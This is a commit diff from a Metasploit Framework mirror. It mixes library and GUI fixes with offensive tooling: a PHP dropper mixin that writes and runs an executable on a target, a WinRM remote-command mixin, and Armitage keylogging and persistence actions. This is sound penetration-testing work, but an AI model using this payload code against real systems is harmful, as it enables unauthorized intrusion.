infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into bug/wrong-file_changed-argument 

Conflicts:
	lib/msf/core/modules/loader/base.rb
unstable
Luke Imhoff 2012-10-24 15:21:46 -05:00
parent 69a8739d52 b3e02f119c
commit 055f95898d
405 changed files with 4031 additions and 1454 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Rakefile
View File

@ -37,7 +37,7 @@ namespace :yard do
task :stats => :environment do
stats = YARD::CLI::Stats.new
yard_arguments = yard_options + ['--compact', '--list-undoc'] + yard_files
stats.run *yard_arguments
stats.run(*yard_arguments)
end
end

BIN
data/armitage/armitage.jar
View File

Binary file not shown.

BIN
data/armitage/cortana.jar
View File

Binary file not shown.

17
data/armitage/whatsnew.txt
View File

@ -1,6 +1,23 @@
Armitage Changelog
==================
16 Oct 12 (tested against msf 15972)
---------
- Added port 5985 to MSF Scans list.
- Meterpreter -> Access -> Persistence sets ACTION option for you
- Changed how LHOST and LPORT are set globally to prevent Ruby
character encoding conversion error in the framework.
- Pass Session, Log Keystrokes, and Persist now query module info
in a separate thread (avoids a deadlock opportunity)
- Armitage now shows folder/URL in a popup dialog for environments
where JDesktop API to open them directly is not supported
- Check all credentials option now filters the list to avoid trying
a pair of credentials twice.
- Armitage's exploit payload selection now selects cmd/unix/interact
when appropriate.
- Explore -> Processes now works with Java Meterpreter again.
- MSF Scans feature now runs http_version against port 443
5 Sept 12 (tested against msf r15804)
---------
- Setup dialog now trims host, port, user, and pass fields.

2
external/ruby-kissfft/Gemfile vendored Executable file
View File

@ -0,0 +1,2 @@
source "http://rubygems.org"
gemspec

6
external/ruby-kissfft/COPYING → external/ruby-kissfft/LICENSE vendored
View File

@ -1,7 +1,8 @@
Kiss FFT library
==================
Copyright (c) 2003-2006 Mark Borgerding
Copyright (c) 2003-2010 Mark Borgerding
All rights reserved.
@ -13,11 +14,10 @@ Redistribution and use in source and binary forms, with or without modification,
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Ruby wrapper layer
==================
Copyright (C) 2009 H D Moore
Copyright (C) 2009-2012 H D Moore < hdm[at]rapid7.com >
All rights reserved.

1
external/ruby-kissfft/Rakefile vendored Executable file
View File

@ -0,0 +1 @@
require "bundler/gem_tasks"

16
external/ruby-kissfft/_kiss_fft_guts.h → external/ruby-kissfft/ext/kissfft/_kiss_fft_guts.h vendored
View File

@ -1,5 +1,5 @@
/*
Copyright (c) 2003-2004, Mark Borgerding
Copyright (c) 2003-2010, Mark Borgerding
All rights reserved.
@ -148,3 +148,17 @@ struct kiss_fft_state{
/* a debugging function */
#define pcpx(c)\
fprintf(stderr,"%g + %gi\n",(double)((c)->r),(double)((c)->i) )
#ifdef KISS_FFT_USE_ALLOCA
// define this to allow use of alloca instead of malloc for temporary buffers
// Temporary buffers are used in two case:
// 1. FFT sizes that have "bad" factors. i.e. not 2,3 and 5
// 2. "in-place" FFTs. Notice the quotes, since kissfft does not really do an in-place transform.
#include <alloca.h>
#define KISS_FFT_TMP_ALLOC(nbytes) alloca(nbytes)
#define KISS_FFT_TMP_FREE(ptr)
#else
#define KISS_FFT_TMP_ALLOC(nbytes) KISS_FFT_MALLOC(nbytes)
#define KISS_FFT_TMP_FREE(ptr) KISS_FFT_FREE(ptr)
#endif

0
external/ruby-kissfft/extconf.rb → external/ruby-kissfft/ext/kissfft/extconf.rb vendored
View File

49
external/ruby-kissfft/kiss_fft.c → external/ruby-kissfft/ext/kissfft/kiss_fft.c vendored
View File

@ -1,5 +1,5 @@
/*
Copyright (c) 2003-2004, Mark Borgerding
Copyright (c) 2003-2010, Mark Borgerding
All rights reserved.
@ -18,21 +18,6 @@ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
fixed or floating point complex numbers. It also delares the kf_ internal functions.
*/
static kiss_fft_cpx *scratchbuf=NULL;
static size_t nscratchbuf=0;
static kiss_fft_cpx *tmpbuf=NULL;
static size_t ntmpbuf=0;
#define CHECKBUF(buf,nbuf,n) \
do { \
if ( nbuf < (size_t)(n) ) {\
free(buf); \
buf = (kiss_fft_cpx*)KISS_FFT_MALLOC(sizeof(kiss_fft_cpx)*(n)); \
nbuf = (size_t)(n); \
} \
}while(0)
static void kf_bfly2(
kiss_fft_cpx * Fout,
const size_t fstride,
@ -69,6 +54,7 @@ static void kf_bfly4(
const size_t m2=2*m;
const size_t m3=3*m;
tw3 = tw2 = tw1 = st->twiddles;
do {
@ -222,29 +208,30 @@ static void kf_bfly_generic(
kiss_fft_cpx t;
int Norig = st->nfft;
CHECKBUF(scratchbuf,nscratchbuf,p);
kiss_fft_cpx * scratch = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC(sizeof(kiss_fft_cpx)*p);
for ( u=0; u<m; ++u ) {
k=u;
for ( q1=0 ; q1<p ; ++q1 ) {
scratchbuf[q1] = Fout[ k ];
C_FIXDIV(scratchbuf[q1],p);
scratch[q1] = Fout[ k ];
C_FIXDIV(scratch[q1],p);
k += m;
}
k=u;
for ( q1=0 ; q1<p ; ++q1 ) {
int twidx=0;
Fout[ k ] = scratchbuf[0];
Fout[ k ] = scratch[0];
for (q=1;q<p;++q ) {
twidx += fstride * k;
if (twidx>=Norig) twidx-=Norig;
C_MUL(t,scratchbuf[q] , twiddles[twidx] );
C_MUL(t,scratch[q] , twiddles[twidx] );
C_ADDTO( Fout[ k ] ,t);
}
k += m;
}
}
KISS_FFT_TMP_FREE(scratch);
}
static
@ -265,7 +252,8 @@ void kf_work(
#ifdef _OPENMP
// use openmp extensions at the
// top-level (not recursive)
if (fstride==1) {
if (fstride==1 && p<=5)
{
int k;
// execute the p different work units in different threads
@ -380,14 +368,15 @@ kiss_fft_cfg kiss_fft_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem
}
void kiss_fft_stride(kiss_fft_cfg st,const kiss_fft_cpx *fin,kiss_fft_cpx *fout,int in_stride)
{
if (fin == fout) {
CHECKBUF(tmpbuf,ntmpbuf,st->nfft);
//NOTE: this is not really an in-place FFT algorithm.
//It just performs an out-of-place FFT into a temp buffer
kiss_fft_cpx * tmpbuf = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC( sizeof(kiss_fft_cpx)*st->nfft);
kf_work(tmpbuf,fin,1,in_stride, st->factors,st);
memcpy(fout,tmpbuf,sizeof(kiss_fft_cpx)*st->nfft);
KISS_FFT_TMP_FREE(tmpbuf);
}else{
kf_work( fout, fin, 1,in_stride, st->factors,st );
}
@ -399,17 +388,9 @@ void kiss_fft(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout)
}
/* not really necessary to call, but if someone is doing in-place ffts, they may want to free the
buffers from CHECKBUF
*/
void kiss_fft_cleanup(void)
{
free(scratchbuf);
scratchbuf = NULL;
nscratchbuf=0;
free(tmpbuf);
tmpbuf=NULL;
ntmpbuf=0;
// nothing needed any more
}
int kiss_fft_next_fast_size(int n)

5
external/ruby-kissfft/kiss_fft.h → external/ruby-kissfft/ext/kissfft/kiss_fft.h vendored
View File

@ -5,7 +5,6 @@
#include <stdio.h>
#include <math.h>
#include <string.h>
#include <malloc.h>
#ifdef __cplusplus
extern "C" {
@ -27,9 +26,11 @@ extern "C" {
#ifdef USE_SIMD
# include <xmmintrin.h>
# define kiss_fft_scalar __m128
#define KISS_FFT_MALLOC(nbytes) memalign(16,nbytes)
#define KISS_FFT_MALLOC(nbytes) _mm_malloc(nbytes,16)
#define KISS_FFT_FREE _mm_free
#else
#define KISS_FFT_MALLOC malloc
#define KISS_FFT_FREE free
#endif

6
external/ruby-kissfft/kiss_fftr.c → external/ruby-kissfft/ext/kissfft/kiss_fftr.c vendored
View File

@ -19,9 +19,9 @@ struct kiss_fftr_state{
kiss_fft_cfg substate;
kiss_fft_cpx * tmpbuf;
kiss_fft_cpx * super_twiddles;
#ifdef USE_SIMD
long pad;
#endif
#ifdef USE_SIMD
void * pad;
#endif
};
kiss_fftr_cfg kiss_fftr_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem)

0
external/ruby-kissfft/kiss_fftr.h → external/ruby-kissfft/ext/kissfft/kiss_fftr.h vendored
View File

0
external/ruby-kissfft/main.c → external/ruby-kissfft/ext/kissfft/main.c vendored
View File

16
external/ruby-kissfft/kissfft.gemspec vendored Normal file
View File

@ -0,0 +1,16 @@
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = "kissfft"
s.version = "0.0.1"
s.authors = ["HD Moore"]
s.email = ["hdm@rapid7.com"]
s.homepage = ""
s.summary = %q{Ruby wrapper around the KisFFT library for performing FFTs}
s.description = %q{Provides access to the KissFFT library for performing fast-fourier transforms from Ruby }
s.files = Dir.glob('lib/**/*.rb') + Dir.glob('ext/**/*.{c,h,rb}') + [ "LICENSE" ]
s.test_files = Dir.glob('test/**/*.{rb,data}')
s.extensions = [ 'ext/kissfft/extconf.rb' ]
s.require_paths = ["lib"]
end

0
external/ruby-kissfft/sample.data → external/ruby-kissfft/tests/sample.data vendored
View File

0
external/ruby-kissfft/test_kissfft.rb → external/ruby-kissfft/tests/test_kissfft.rb vendored
View File

2
external/source/armitage/resources/about.html vendored
View File

@ -3,7 +3,7 @@
<center><h1>Armitage 1.44</h1></center>
<p>An attack management tool for Metasploit&reg;
<br />Release: 5 Sept 12</p>
<br />Release: 16 Oct 12</p>
<br />
<p>Developed by:</p>

3
external/source/armitage/scripts/attacks.sl vendored
View File

@ -349,6 +349,9 @@ sub best_payload {
else if ("java/jsp_shell_bind_tcp" in $compatible) {
return "java/jsp_shell_bind_tcp";
}
else if ("cmd/unix/interact" in $compatible) {
return "cmd/unix/interact";
}
else {
return "generic/shell_bind_tcp";
}

7
external/source/armitage/scripts/gui.sl vendored
View File

@ -475,7 +475,12 @@ sub gotoFile {
return lambda({
local('$exception');
try {
[[Desktop getDesktop] open: $f];
if ([Desktop isDesktopSupported]) {
[[Desktop getDesktop] open: $f];
}
else {
ask("Browse to this file:", $f);
}
}
catch $exception {
showError("Could not open $f $+ \n $+ $exception");

10
external/source/armitage/scripts/jobs.sl vendored
View File

@ -356,6 +356,16 @@ sub _launch_dialog {
if (!isShift($1)) {
[$dialog setVisible: 0];
}
# fix some module options...
if ($command eq "windows/manage/persistence") {
if ('REXE' in $options) {
$options['ACTION'] = 'REXE';
}
else {
$options['ACTION'] = 'TEMPLATE';
}
}
# it's go time buddy... time to filter some stuff...
($type, $command, $options) = filter_data("user_launch", $type, $command, $options);

7
external/source/armitage/scripts/menus.sl vendored
View File

@ -188,7 +188,12 @@ sub main_attack_items {
sub gotoURL {
return lambda({
[[Desktop getDesktop] browse: $url];
if ([Desktop isDesktopSupported]) {
[[Desktop getDesktop] browse: $url];
}
else {
ask("Browse to this URL:", $url);
}
}, $url => [[new URL: $1] toURI]);
}

24
external/source/armitage/scripts/meterpreter.sl vendored
View File

@ -191,11 +191,15 @@ sub showMeterpreterMenu {
}, $sid => "$sid"));
item($j, "Persist", 'P', lambda({
launch_dialog("Persistence", "post", "windows/manage/persistence", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
thread(lambda({
launch_dialog("Persistence", "post", "windows/manage/persistence", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
}, \$sid));
}, $sid => "$sid"));
item($j, "Pass Session", 'S', lambda({
launch_dialog("Pass Session", "post", "windows/manage/payload_inject", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
thread(lambda({
launch_dialog("Pass Session", "post", "windows/manage/payload_inject", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
}, \$sid));
}, $sid => "$sid"));
setupMenu($j, "meterpreter_access", @($sid));
@ -241,7 +245,9 @@ sub showMeterpreterMenu {
item($j, "Show Processes", 'P', lambda({ createProcessBrowser($sid); }, $sid => "$sid"));
if ("*win*" iswm $platform) {
item($j, "Log Keystrokes", 'K', lambda({
launch_dialog("Log Keystrokes", "post", "windows/capture/keylog_recorder", 1, $null, %(SESSION => $sid, MIGRATE => 1, ShowKeystrokes => 1));
thread(lambda({
launch_dialog("Log Keystrokes", "post", "windows/capture/keylog_recorder", 1, $null, %(SESSION => $sid, MIGRATE => 1, ShowKeystrokes => 1));
}, \$sid));
}, $sid => "$sid"));
}
@ -305,6 +311,9 @@ sub launch_msf_scans {
if ('RPORT' in %o) {
$port = %o['RPORT']['default'];
push(%ports[$port], $scanner);
if ($port == 80) {
push(%ports['443'], $scanner);
}
}
safetyCheck();
@ -313,7 +322,7 @@ sub launch_msf_scans {
# add these ports to our list of ports to scan.. these come from querying all of Metasploit's modules
# for the default ports
foreach $port (@(50000, 21, 1720, 80, 443, 143, 3306, 1521, 110, 5432, 50013, 25, 161, 22, 23, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 623, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902)) {
foreach $port (@(50000, 21, 1720, 80, 443, 143, 3306, 1521, 110, 5432, 50013, 25, 161, 22, 23, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 623, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902, 5985)) {
$temp = %ports[$port];
}
@ -343,7 +352,12 @@ sub launch_msf_scans {
if ($port in %ports) {
$modules = %ports[$port];
foreach $module ($modules) {
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24)));
if ($port == 443) {
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24, SSL => "1")));
}
else {
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24)));
}
}
}
}

13
external/source/armitage/scripts/passhash.sl vendored
View File

@ -297,19 +297,24 @@ sub show_login_dialog {
}
sub createUserPassFile {
local('$handle $user $pass $type $row $2 $name');
local('$handle $user $pass $type $row $2 $name %entries');
$name = "userpass" . rand(10000) . ".txt";
$handle = openf("> $+ $name");
# loop through our entries and store them
%entries = ohash();
foreach $row ($1) {
($user, $pass, $type) = values($row, @("user", "pass", "ptype"));
if ($type eq "password" || $type eq $2) {
println($handle, "$user $pass");
%entries["$user $pass"] = "$user $pass";
}
else {
println($handle, "$user");
%entries[$user] = $user;
}
}
# print out unique entry values
$handle = openf("> $+ $name");
printAll($handle, values(%entries));
closef($handle);
if ($client !is $mclient) {

6
external/source/armitage/scripts/process.sl vendored
View File

@ -27,6 +27,12 @@ sub parseProcessList {
# REMOVEME--this is a backwards compatability hack.
@rows = parseTextTable($2, @("PID", "Name", "Arch", "Session", "User", "Path"));
}
# this is the format for Java meterpreter
if (size(@rows) == 0) {
@rows = parseTextTable($2, @("PID", "Name", "Arch", "User", "Path"));
}
foreach $row (@rows) {
[%processes[$1] addEntry: $row];
}

14
external/source/armitage/scripts/server.sl vendored
View File

@ -355,7 +355,7 @@ sub client {
sub main {
global('$client $mclient');
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle');
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle $console');
$auth = unpack("H*", digest(rand() . ticks(), "MD5"))[0];
@ -400,9 +400,6 @@ sub main {
$mclient = $client;
initConsolePool(); # this needs to happen... right now.
# set the LHOST to whatever the user specified
call_async($client, "core.setg", "LHOST", $host);
# we need this global to be set so our reverse listeners work as expected.
$MY_ADDRESS = $host;
@ -423,6 +420,13 @@ sub main {
$lock_lock = semaphore(1);
$cach_lock = semaphore(1);
# set the LHOST to whatever the user specified (use console.write to make the string not UTF-8)
$console = createConsole($client);
call($client, "console.write", $console, "setg LHOST $host $+ \n");
sleep(2000);
# absorb the output of this command which is LHOST => ...
call($client, "console.read", $console);
#
# create a thread to push console messages to the event queue for all clients.
#
@ -437,7 +441,7 @@ sub main {
release($poll_lock);
}
}
}, \$client, \$poll_lock, \@events, $console => createConsole($client));
}, \$client, \$poll_lock, \@events, \$console);
#
# Create a shared hash that contains a thread for each session...

5
external/source/armitage/scripts/util.sl vendored
View File

@ -152,7 +152,10 @@ sub createConsoleTab {
sub setg {
%MSF_GLOBAL[$1] = $2;
call_async($client, "core.setg", $1, $2);
local('$c');
$c = createConsole($client);
call_async($client, "console.write", $c, "setg $1 $2 $+ \n");
call_async($client, "console.release", $c);
}
sub createDefaultHandler {

3
external/source/armitage/src/armitage/ConsoleClient.java vendored
View File

@ -104,6 +104,9 @@ public class ConsoleClient implements Runnable, ActionListener {
if (destroyCommand != null) {
((RpcAsync)connection).execute_async(destroyCommand, new Object[] { session });
}
/* we don't need to keep reading from this console */
kill();
}
protected void finalize() {

17
external/source/armitage/whatsnew.txt vendored
View File

@ -1,6 +1,23 @@
Armitage Changelog
==================
16 Oct 12 (tested against msf 15972)
---------
- Added port 5985 to MSF Scans list.
- Meterpreter -> Access -> Persistence sets ACTION option for you
- Changed how LHOST and LPORT are set globally to prevent Ruby
character encoding conversion error in the framework.
- Pass Session, Log Keystrokes, and Persist now query module info
in a separate thread (avoids a deadlock opportunity)
- Armitage now shows folder/URL in a popup dialog for environments
where JDesktop API to open them directly is not supported
- Check all credentials option now filters the list to avoid trying
a pair of credentials twice.
- Armitage's exploit payload selection now selects cmd/unix/interact
when appropriate.
- Explore -> Processes now works with Java Meterpreter again.
- MSF Scans feature now runs http_version against port 443
5 Sept 12 (tested against msf r15804)
---------
- Setup dialog now trims host, port, user, and pass fields.

11
lib/msf/core/exploit/http/server.rb
View File

@ -80,6 +80,12 @@ module Exploit::Remote::HttpServer
def print_debug(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
#
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
def print_warning(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
@ -101,6 +107,11 @@ module Exploit::Remote::HttpServer
def vprint_debug(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
def vprint_warning(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
#

3
lib/msf/core/exploit/mixins.rb
View File

@ -88,3 +88,6 @@ require 'msf/core/exploit/java'
# WBEM
require 'msf/core/exploit/wbemexec'
#WinRM
require 'msf/core/exploit/winrm'

88
lib/msf/core/exploit/php_exe.rb Normal file
View File

@ -0,0 +1,88 @@
# -*- coding: binary -*-
##
# $Id$
##
###
#
# This module exposes a simple method to create an payload in an executable.
#
###
require 'msf/core/payload/php'
module Msf
module Exploit::PhpEXE
include Exploit::EXE
include Payload::Php
#
# Generate a first-stage php payload.
#
# For ARCH_PHP targets, simply returns payload.encoded wrapped in <?php ?>
# markers.
#
# For target architectures other than ARCH_PHP, this will base64 encode an
# appropriate executable and drop it on the target system. After running
# it, the generated code will attempt to unlink the dropped executable which
# will certainly fail on Windows.
#
# @option opts [String] :writable_path A path on the victim where we can
# write an executable. Uses current directory if not given.
# @option opts [Boolean] :unlink_self Whether to call unlink(__FILE__); in
# the payload. Good idea for arbitrary-file-upload vulns, bad idea for
# write-to-a-config-file vulns
#
# @return [String] A PHP payload that will drop an executable for non-php
# target architectures
#
# @todo Test on Windows
def get_write_exec_payload(opts={})
case target_arch.first
when ARCH_PHP
php = payload.encoded
else
bin_name = Rex::Text.rand_text_alpha(8)
if opts[:writable_path]
bin_name = [opts[:writable_path], bin_name].join("/")
else
bin_name = "./#{bin_name}"
end
if target["Platform"] == 'win'
bin_name << ".exe"
print_debug("Unable to clean up #{bin_name}, delete it manually")
end
p = Rex::Text.encode_base64(generate_payload_exe)
php = %Q{
error_reporting(0);
$ex = "#{bin_name}";
$f = fopen($ex, "wb");
fwrite($f, base64_decode("#{p}"));
fclose($f);
chmod($ex, 0777);
function my_cmd($cmd) {
#{php_preamble}
#{php_system_block};
}
if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {
my_cmd($ex . "&");
} else {
my_cmd($ex);
}
unlink($ex);
}
end
if opts[:unlink_self]
php << "unlink(__FILE__);"
end
php.gsub!(/#.*$/, '')
php.gsub!(/[\t ]+/, ' ')
php.gsub!(/\n/, ' ')
return "<?php #{php} ?>"
end
end
end

471
lib/msf/core/exploit/winrm.rb Normal file
View File

@ -0,0 +1,471 @@
# -*- coding: binary -*-
require 'uri'
require 'digest'
require 'rex/proto/ntlm/crypt'
require 'rex/proto/ntlm/constants'
require 'rex/proto/ntlm/utils'
require 'rex/proto/ntlm/exceptions'
module Msf
module Exploit::Remote::WinRM
include Exploit::Remote::NTLM::Client
include Exploit::Remote::HttpClient
#
# Constants
#
NTLM_CRYPT ||= Rex::Proto::NTLM::Crypt
NTLM_CONST ||= Rex::Proto::NTLM::Constants
NTLM_UTILS ||= Rex::Proto::NTLM::Utils
NTLM_XCEPT ||= Rex::Proto::NTLM::Exceptions
def initialize(info = {})
super
register_options(
[
Opt::RHOST,
Opt::RPORT(5985),
OptString.new('VHOST', [ false, "HTTP server virtual host" ]),
OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]),
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]),
OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentification', 'WORKSTATION']),
OptString.new('URI', [ true, "The URI of the WinRM service", "/wsman" ]),
OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]),
OptString.new('PASSWORD', [ false, 'A specific password to authenticate with' ])
], self.class
)
register_autofilter_ports([ 80,443,5985,5986 ])
register_autofilter_services(%W{ winrm })
end
def winrm_poke(timeout = 20)
opts = {
'uri' => datastore['URI'],
'data' => Rex::Text.rand_text_alpha(8)
}
c = connect(opts)
to = opts[:timeout] || timeout
ctype = "application/soap+xml;charset=UTF-8"
resp, c = send_request_cgi(opts.merge({
'uri' => opts['uri'],
'method' => 'POST',
'ctype' => ctype,
'data' => opts['data']
}), to)
return resp
end
def parse_auth_methods(resp)
return [] unless resp and resp.code == 401
methods = []
methods << "Negotiate" if resp.headers['WWW-Authenticate'].include? "Negotiate"
methods << "Kerberos" if resp.headers['WWW-Authenticate'].include? "Kerberos"
methods << "Basic" if resp.headers['WWW-Authenticate'].include? "Basic"
return methods
end
def winrm_run_cmd(cmd, timeout=20)
resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
if resp.code == 401
print_error "Login failure! Recheck supplied credentials."
return resp .code
end
unless resp.code == 200
print_error "Got unexpected response: \n #{resp.to_s}"
retval == resp.code || 0
return retval
end
shell_id = winrm_get_shell_id(resp)
resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout)
cmd_id = winrm_get_cmd_id(resp)
resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout)
streams = winrm_get_cmd_streams(resp)
resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout)
resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id))
return streams
end
def winrm_wql_msg(wql)
action = winrm_uri_action("wql")
contents = winrm_header(action) + winrm_wql_body(wql)
msg = winrm_envelope(contents)
return msg
end
def winrm_open_shell_msg
action = winrm_uri_action("create_shell")
options = winrm_option_set([['WINRS_NOPROFILE', 'FALSE'], ['WINRS_CODEPAGE', '437']])
header_data = action + options
contents = winrm_header(header_data) + winrm_open_shell_body
msg = winrm_envelope(contents)
return msg
end
def winrm_cmd_msg(cmd,shell_id)
action = winrm_uri_action("send_cmd")
options = winrm_option_set([['WINRS_CONSOLEMODE_STDIN', 'TRUE'], ['WINRS_SKIP_CMD_SHELL', 'FALSE']])
selectors = winrm_selector_set([['ShellId', shell_id]])
header_data = action + options + selectors
contents = winrm_header(header_data) + winrm_cmd_body(cmd)
msg = winrm_envelope(contents)
return msg
end
def winrm_cmd_recv_msg(shell_id,cmd_id)
action = winrm_uri_action("recv_cmd")
selectors = winrm_selector_set([['ShellId', shell_id]])
header_data = action + selectors
contents = winrm_header(header_data) + winrm_cmd_recv_body(cmd_id)
msg = winrm_envelope(contents)
return msg
end
def winrm_terminate_cmd_msg(shell_id,cmd_id)
action = winrm_uri_action("signal_shell")
selectors = winrm_selector_set([['ShellId', shell_id]])
header_data = action + selectors
contents = winrm_header(header_data) + winrm_terminate_cmd_body(cmd_id)
msg = winrm_envelope(contents)
return msg
end
def winrm_delete_shell_msg(shell_id)
action = winrm_uri_action("delete_shell")
selectors = winrm_selector_set([['ShellId', shell_id]])
header_data = action + selectors
contents = winrm_header(header_data) + winrm_empty_body
msg = winrm_envelope(contents)
return msg
end
def parse_wql_response(response)
xml = response.body
columns = []
rows =[]
rxml = REXML::Document.new(xml).root
items = rxml.elements["///w:Items"]
items.elements.to_a("///w:XmlFragment").each do |node|
row_data = []
node.elements.to_a.each do |sub_node|
columns << sub_node.name
row_data << sub_node.text
end
rows << row_data
end
response_data = Rex::Ui::Text::Table.new(
'Header' => "#{datastore['WQL']} (#{rhost})",
'Indent' => 1,
'Columns' => columns.uniq!
)
rows.each do |row|
response_data << row
end
return response_data
end
def winrm_get_shell_id(response)
xml = response.body
shell_id = REXML::Document.new(xml).elements["//w:Selector"].text
end
def winrm_get_cmd_id(response)
xml = response.body
cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text
end
def winrm_get_cmd_streams(response)
streams = {
'stdout' => '',
'stderr' => '',
}
xml = response.body
rxml = REXML::Document.new(xml).root
rxml.elements.to_a("//rsp:Stream").each do |node|
next if node.text.nil?
streams[node.attributes['Name']] << Rex::Text.base64_decode(node.text)
end
return streams
end
def generate_uuid
::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))
end
def send_request_ntlm(data, timeout = 20)
opts = {
'uri' => datastore['URI'],
'data' => data,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
ntlm_options =
{
:signing => false,
:usentlm2_session => datastore['NTLM::UseNTLM2_session'],
:use_ntlmv2 => datastore['NTLM::UseNTLMv2'],
:send_lm => datastore['NTLM::SendLM'],
:send_ntlm => datastore['NTLM::SendNTLM']
}
ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options)
workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
domain_name = datastore['DOMAIN']
ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name,
workstation_name,
ntlmssp_flags))
to = opts[:timeout] || timeout
begin
c = connect(opts)
ctype = "application/soap+xml;charset=UTF-8"
# First request to get the challenge
r = c.request_cgi(opts.merge({
'uri' => opts['uri'],
'method' => 'POST',
